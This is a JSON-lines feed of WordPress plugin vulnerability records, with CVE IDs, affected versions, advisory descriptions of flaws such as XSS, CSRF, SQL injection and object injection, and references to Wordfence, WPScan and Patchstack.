{"CVE_ID":"CVE-2024-5172","slug":"expert-invoice","versionImpact":"1.0.2","description":"The Expert Invoice WordPress plugin through 1.0.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/65d84e69-0548-4c7d-bcde-5777d72da555\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/65d84e69-0548-4c7d-bcde-5777d72da555\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6496","slug":"light-poll","versionImpact":"1.0.0","description":"The Light Poll WordPress plugin through 1.0.0 does not have CSRF checks when deleting polls, which could allow attackers to make logged in users perform such action via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d598eabd-a87a-4e3e-be46-a5c5cc3f130e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d598eabd-a87a-4e3e-be46-a5c5cc3f130e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8318","slug":"attributes-for-blocks","versionImpact":"1.0.6","description":"The Attributes for Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018attributesForBlocks\u2019 parameter in all versions up to, and including, 1.0.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a0101dd1-a9cb-4b9c-8299-9b808d7e1912?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a0101dd1-a9cb-4b9c-8299-9b808d7e1912?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/attributes-for-blocks\\\/trunk\\\/attributes-for-blocks.php#L246\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/attributes-for-blocks\\\/trunk\\\/attributes-for-blocks.php#L246\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/attributes-for-blocks\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/attributes-for-blocks\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/attributes-for-blocks\\\/trunk\\\/attributes-for-blocks.php#L96\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/attributes-for-blocks\\\/trunk\\\/attributes-for-blocks.php#L96\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fattributes-for-blocks&old=3066420&new_path=%2Fattributes-for-blocks&new=3144730&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fattributes-for-blocks&old=3066420&new_path=%2Fattributes-for-blocks&new=3144730&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6931","slug":"the-events-calendar","versionImpact":"6.6.3","description":"The The Events Calendar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via RSVP name field in all versions up to, and including, 6.6.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a5f847d8-323f-47f9-ba10-df8173ff3018?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a5f847d8-323f-47f9-ba10-df8173ff3018?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/the-events-calendar\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/the-events-calendar\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3150170\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3150170\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36839","slug":"free-sales-funnel-squeeze-pages-landing-page-builder-templates-make","versionImpact":"0.99","description":"The WP Lead Plus X plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 0.99. This is due to missing or incorrect nonce validation on several functions. This makes it possible for unauthenticated attackers to perform administrative actions, such as adding pages to the site and\/or replacing site content with malicious JavaScript via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ddb97db0-cbf3-42be-a5c7-12fc2a2bc9e8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ddb97db0-cbf3-42be-a5c7-12fc2a2bc9e8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/blog\\\/2020\\\/04\\\/critical-vulnerabilities-in-the-wp-lead-plus-x-wordpress-plugin\\\/\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/blog\\\/2020\\\/04\\\/critical-vulnerabilities-in-the-wp-lead-plus-x-wordpress-plugin\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/free-sales-funnel-squeeze-pages-landing-page-builder-templates-make\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/free-sales-funnel-squeeze-pages-landing-page-builder-templates-make\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12807","slug":"share-buttons","versionImpact":"2.7","description":"The Social Share Buttons for WordPress plugin through 2.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fcce0839-bb1d-4aa3-b236-ff5f5e9b6120\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fcce0839-bb1d-4aa3-b236-ff5f5e9b6120\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13735","slug":"hurrytimer","versionImpact":"2.11.2","description":"The HurryTimer \u2013 An Scarcity and Urgency Countdown Timer for WordPress & WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 2.11.2 due to insufficient input sanitization and output escaping of a campaign name. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/docs.hurrytimer.com\\\/getting-started\\\/creating-a-one-time-campaign\",\"name\":\"https:\\\/\\\/docs.hurrytimer.com\\\/getting-started\\\/creating-a-one-time-campaign\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3239755\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3239755\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/hurrytimer\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/hurrytimer\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a5b247a7-50f4-4d35-b24a-2c788ba0b051?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a5b247a7-50f4-4d35-b24a-2c788ba0b051?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7697","slug":"integration-for-contact-form-7-and-google-sheets","versionImpact":"1.1.1","description":"The Integration for Google Sheets and Contact Form 7, WPForms, Elementor, Ninja Forms plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.1.1 via deserialization of untrusted input within the verify_field_val() function. This makes it possible for unauthenticated attackers to inject a PHP Object. The additional presence of a POP chain in the Contact Form 7 plugin, which is likely to be used alongside, allows attackers to delete arbitrary files, leading to a denial of service or remote code execution when the wp-config.php file is deleted.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/integration-for-contact-form-7-and-google-sheets\\\/tags\\\/1.1.1\\\/integration-for-contact-form-7-and-google-sheets.php#L923\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/integration-for-contact-form-7-and-google-sheets\\\/tags\\\/1.1.1\\\/integration-for-contact-form-7-and-google-sheets.php#L923\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3329005\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3329005\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/integration-for-contact-form-7-and-google-sheets\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/integration-for-contact-form-7-and-google-sheets\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a0146f17-35bd-45cf-b9c6-c4fce688efc2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a0146f17-35bd-45cf-b9c6-c4fce688efc2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1335","slug":"unusedcss","versionImpact":"1.7.1","description":"The RapidLoad Power-Up for Autoptimize plugin for WordPress is vulnerable to unauthorized plugin settings update due to a missing capability check on the ucss_connect function in versions up to, and including, 1.7.1. This makes it possible for authenticated attackers with subscriber-level access to connect a new license key to the site.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eba48c51-87d9-4e7e-b4c1-0205cd96d033\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eba48c51-87d9-4e7e-b4c1-0205cd96d033\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2877726\\\/unusedcss\\\/trunk\\\/includes\\\/modules\\\/unused-css\\\/UnusedCSS_Admin.php?contextall=1&old=2847136&old_path=%2Funusedcss%2Ftrunk%2Fincludes%2Fmodules%2Funused-css%2FUnusedCSS_Admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2877726\\\/unusedcss\\\/trunk\\\/includes\\\/modules\\\/unused-css\\\/UnusedCSS_Admin.php?contextall=1&old=2847136&old_path=%2Funusedcss%2Ftrunk%2Fincludes%2Fmodules%2Funused-css%2FUnusedCSS_Admin.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0514","slug":"member-database","versionImpact":"1.0","description":"The Membership Database WordPress plugin through 1.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c6cc400a-9bfb-417d-9206-5582a49d0f05\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c6cc400a-9bfb-417d-9206-5582a49d0f05\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2897","slug":"brizy","versionImpact":"2.4.18","description":"The Brizy Page Builder plugin for WordPress is vulnerable to IP Address Spoofing in versions up to, and including, 2.4.18. This is due to an implicit trust of user-supplied IP addresses in an 'X-Forwarded-For' HTTP header for the purpose of validating allowed IP addresses against a Maintenance Mode whitelist. Supplying a whitelisted IP address within the 'X-Forwarded-For' header allows maintenance mode to be bypassed and may result in the disclosure of potentially sensitive information or allow access to restricted functionality.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ae342dd9-2f5f-4356-8fb4-9a3e5f4f8316?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ae342dd9-2f5f-4356-8fb4-9a3e5f4f8316?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2919443\\\/brizy\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2919443\\\/brizy\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4917","slug":"leyka","versionImpact":"3.30.3","description":"The Leyka plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 3.30.3 via the 'leyka_ajax_get_env_and_options' function. This can allow authenticated attackers with subscriber-level permissions or above to extract sensitive data including Sberbank API key and password, PayPal Client Secret, and more keys and passwords.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/leyka\\\/tags\\\/3.30.3\\\/inc\\\/leyka-ajax.php#L393\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/leyka\\\/tags\\\/3.30.3\\\/inc\\\/leyka-ajax.php#L393\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dcd24b90-94ff-4625-8e3e-9c90e38683f9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dcd24b90-94ff-4625-8e3e-9c90e38683f9?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-49744","slug":"gift-up","versionImpact":"2.21.3","description":"Cross-Site Request Forgery (CSRF) vulnerability in Gift Up Gift Up Gift Cards for WordPress and WooCommerce.This issue affects Gift Up Gift Cards for WordPress and WooCommerce: from n\/a through 2.21.3.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/gift-up\\\/wordpress-gift-up-gift-cards-for-wordpress-and-woocommerce-plugin-2-21-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/gift-up\\\/wordpress-gift-up-gift-cards-for-wordpress-and-woocommerce-plugin-2-21-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0824","slug":"userplus","versionImpact":"2.0","description":"The User registration & user profile WordPress plugin through 2.0 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged-in admin add Stored XSS payloads via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/48a3a542-9130-4524-9d19-ff9eccecb148\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/48a3a542-9130-4524-9d19-ff9eccecb148\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1810","slug":"archivist-custom-archive-templates","versionImpact":"1.7.5","description":"The Archivist \u2013 Custom Archive Templates plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018shortcode_attributes' parameter in all versions up to, and including, 1.7.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e230f9f-5eda-4362-973b-ada9cf425697?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e230f9f-5eda-4362-973b-ada9cf425697?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3040242%40archivist-custom-archive-templates&new=3040242%40archivist-custom-archive-templates&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3040242%40archivist-custom-archive-templates&new=3040242%40archivist-custom-archive-templates&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1793","slug":"aweber-web-form-widget","versionImpact":"7.3.14","description":"The AWeber \u2013 Free Sign Up Form and Landing Page Builder Plugin for Lead Generation and Email Newsletter Growth plugin for WordPress is vulnerable to SQL Injection via the 'post_id' parameter in all versions up to, and including, 7.3.14 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f3ae3bca-d363-4c4b-809f-0625385bc9a6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f3ae3bca-d363-4c4b-809f-0625385bc9a6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/aweber-web-form-widget\\\/tags\\\/7.3.12\\\/php\\\/aweber_webform_plugin.php#L962\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/aweber-web-form-widget\\\/tags\\\/7.3.12\\\/php\\\/aweber_webform_plugin.php#L962\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/aweber-web-form-widget\\\/tags\\\/7.3.12\\\/php\\\/aweber_webform_plugin.php#L970\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/aweber-web-form-widget\\\/tags\\\/7.3.12\\\/php\\\/aweber_webform_plugin.php#L970\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/aweber-web-form-widget\\\/tags\\\/7.3.12\\\/php\\\/aweber_webform_plugin.php#L972\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/aweber-web-form-widget\\\/tags\\\/7.3.12\\\/php\\\/aweber_webform_plugin.php#L972\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/glimmer-handball-dae.notion.site\\\/AWeber-Authenticated-SQLi-Admin-6e0d31c4a14c42f4996f9e201482d4cc?pvs=4\",\"name\":\"https:\\\/\\\/glimmer-handball-dae.notion.site\\\/AWeber-Authenticated-SQLi-Admin-6e0d31c4a14c42f4996f9e201482d4cc?pvs=4\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3042751%40aweber-web-form-widget&new=3042751%40aweber-web-form-widget&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3042751%40aweber-web-form-widget&new=3042751%40aweber-web-form-widget&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3405","slug":"wp-prayer","versionImpact":"2.0.9","description":"The WP Prayer WordPress plugin through 2.0.9 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6968d43c-16ff-43a9-8451-71aabbe69014\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6968d43c-16ff-43a9-8451-71aabbe69014\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1375","slug":"event-post","versionImpact":"5.9.5","description":"The Event post plugin for WordPress is vulnerable to unauthorized bulk metadata update due to a missing nonce check on the save_bulkdatas function in all versions up to, and including, 5.9.5. This makes it possible for unauthenticated attackers to update post_meta_data via a forged request, granted they can trick a logged-in user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/964950dc-d8e1-4a9b-bef2-ea51abc5a925?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/964950dc-d8e1-4a9b-bef2-ea51abc5a925?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/event-post\\\/trunk\\\/eventpost.php?rev=3086840#L2446\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/event-post\\\/trunk\\\/eventpost.php?rev=3086840#L2446\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8442","slug":"bdthemes-prime-slider-lite","versionImpact":"3.15.18","description":"The Prime Slider \u2013 Addons For Elementor (Revolution of a slider, Hero Slider, Ecommerce Slider) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Blog widget in all versions up to, and including, 3.15.18 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eff765b4-22d1-4311-8a69-af6b41ef4b6e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eff765b4-22d1-4311-8a69-af6b41ef4b6e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-prime-slider-lite\\\/trunk\\\/traits\\\/global-widget-controls.php#L2328\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-prime-slider-lite\\\/trunk\\\/traits\\\/global-widget-controls.php#L2328\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bdthemes-prime-slider-lite\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bdthemes-prime-slider-lite\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3182825\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3182825\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11808","slug":"pingmeter-uptime-monitoring","versionImpact":"1.0.3","description":"The Pingmeter Uptime Monitoring plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the '_wpnonce' parameter in all versions up to, and including, 1.0.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pingmeter-uptime-monitoring\\\/trunk\\\/pingmeter.php#L909\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pingmeter-uptime-monitoring\\\/trunk\\\/pingmeter.php#L909\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7da41c7c-31c4-4e95-ac5a-25bd17e507b9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7da41c7c-31c4-4e95-ac5a-25bd17e507b9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12285","slug":"sema-api","versionImpact":"5.27","description":"The SEMA API plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018catid\u2019 parameter in all versions up to, and including, 5.27 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sema-api\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sema-api\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/42b9e16c-8e53-452d-9c0b-34c424d6f508?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/42b9e16c-8e53-452d-9c0b-34c424d6f508?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3782","slug":"cision-block","versionImpact":"4.3.0","description":"The Cision Block plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018id\u2019 parameter in all versions up to, and including, 4.3.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cision-block\\\/tags\\\/4.3.0\\\/src\\\/Frontend\\\/templates\\\/cision-block.php#L51\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cision-block\\\/tags\\\/4.3.0\\\/src\\\/Frontend\\\/templates\\\/cision-block.php#L51\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3288041\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3288041\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cision-block\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cision-block\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c5b8268a-f3a3-4576-b235-962de37cc388?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c5b8268a-f3a3-4576-b235-962de37cc388?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4194","slug":"alt-monitoring","versionImpact":"1.0.3","description":"The AlT Monitoring plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.3. This is due to missing or incorrect nonce validation on the 'ALT_Monitoring_edit' page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/alt-monitoring\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/alt-monitoring\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b7290317-418d-4e5c-85fa-f931cc4a865b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b7290317-418d-4e5c-85fa-f931cc4a865b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
